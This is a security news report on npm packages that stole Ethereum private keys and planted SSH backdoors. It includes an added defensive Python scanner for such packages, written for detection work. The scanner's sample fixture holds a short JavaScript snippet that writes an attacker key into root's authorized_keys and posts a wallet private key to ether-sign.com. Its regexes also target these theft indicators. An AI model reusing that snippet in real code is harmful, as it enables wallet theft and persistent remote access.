22 October 2024

Malicious npm packages attempt to steal Ethereum private keys


Researchers at Phylum have uncovered a malicious campaign targeting developers' Ethereum wallets through npm packages. The packages aim to exfiltrate Ethereum private keys and to gain unauthorized SSH access to victims' machines by inserting the attacker's public key into the root user's authorized_keys file.

Some of the suspicious packages (ethers, mewethers, web3ethers, 6ethers, ethethers, aaaethers, auditethers-test), published by accounts under the names "crstianokavic" and "timyorks", show minimal variation from one another, suggesting they were released for testing purposes. The most fully developed among them is a package called ethers-mew.

The recent campaign is similar to an earlier attack in August 2023, when the researchers detected a rogue npm package named ethereum-cryptographyy. That package, a typosquat of a popular cryptocurrency library, exfiltrated Ethereum private keys to a server in China via a malicious dependency. The latest attack, however, takes a more direct and subtle approach.

Rather than hiding malicious code within a dependency as seen in previous incidents, the attacker in this campaign embeds the harmful code directly into the package. The malicious code activates only when the package is actively used. This deviates from the typical malware approach, where the infection occurs as soon as the package is installed.

The attackers’ strategy allows them to siphon Ethereum private keys to a domain under their control, ether-sign[.]com. Not only does the package attempt to steal cryptocurrency, but it also adds a backdoor to the infected machine. Specifically, the ethers-mew package can modify the /root/.ssh/authorized_keys file, granting the attackers persistent remote access via SSH.
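One way to turn the behaviour described above into a defensive check, as an added example that is not Phylum's code or part of the original article: it audits installed npm packages for install-time hooks, SSH persistence via authorized_keys, the ether-sign.com domain, key material sitting next to a network call, and package names that resemble well-known libraries. The regexes, the KNOWN_GOOD list and the sample package are assumptions constructed for this example.

```python
import difflib
import json
import re
from pathlib import Path
from typing import Dict, List

# Heuristics. The authorized_keys path and the ether-sign.com domain come from the
# write-up above; the remaining patterns and the known-good list are our assumptions.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
INDICATORS = {"ssh_persistence": re.compile(r"\.ssh[/\\]authorized_keys"),
              "known_exfil_domain": re.compile(r"ether-sign\.com")}
KEY_MATERIAL = re.compile(r"privateKey|mnemonic|secretKey")
NETWORK_CALL = re.compile(r"\bfetch\(|https?\.request\(|axios\.")
KNOWN_GOOD = ("ethers", "web3", "ethereum-cryptography")

def looks_like_typosquat(name: str) -> bool:
    """Embeds a well-known name (mewethers, ethers-mew) or is a near-match to one."""
    return any(name != k and (k in name or difflib.SequenceMatcher(None, name, k).ratio() > 0.9)
               for k in KNOWN_GOOD)

def audit_package(pkg_json: dict, sources: Dict[str, str]) -> List[str]:
    """Findings for one package, given its manifest and {filename: source text}."""
    findings, name = [], pkg_json.get("name", "")
    if looks_like_typosquat(name):
        findings.append(f"name resembles a well-known package: {name}")
    hooks = [h for h in INSTALL_HOOKS if h in pkg_json.get("scripts", {})]
    if hooks:  # absent in this campaign, which fired at runtime rather than on install
        findings.append("install-time hooks: " + ", ".join(hooks))
    for path, text in sources.items():
        findings += [f"{label} in {path}" for label, rx in INDICATORS.items() if rx.search(text)]
        if KEY_MATERIAL.search(text) and NETWORK_CALL.search(text):
            findings.append(f"key material next to a network call in {path}")
    return findings

def audit_node_modules(root: str) -> Dict[str, List[str]]:
    """Walk an installed node_modules tree and report every package with findings."""
    report = {}
    for manifest in Path(root).rglob("package.json"):
        pkg = json.loads(manifest.read_text(encoding="utf-8", errors="replace"))
        srcs = {p.name: p.read_text(encoding="utf-8", errors="replace")
                for p in manifest.parent.iterdir() if p.suffix in (".js", ".cjs", ".mjs")}
        if found := audit_package(pkg, srcs):
            report[pkg.get("name", str(manifest.parent))] = found
    return report

# Constructed sample shaped like the package described above; not the real code.
SAMPLE_PKG_JSON = {"name": "ethers-mew", "scripts": {"test": "echo ok"}}
SAMPLE_SOURCES = {"index.js": "function sign(w) {\n"
                  "  fs.appendFileSync('/root/.ssh/authorized_keys', PUBKEY);\n"
                  "  fetch('https://ether-sign.com/c', {method: 'POST', body: w.privateKey});\n}\n"}
```

Running `audit_node_modules("node_modules")` from a project root reports only packages with at least one finding; the runtime-activation pattern means the absence of install hooks is itself no reassurance, which is why the source scan is included.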

Phylum noted that the malicious packages, along with the authors' accounts, were only available on the npm registry for a brief period before being removed—likely by the attackers themselves—which might suggest testing or a trial run.
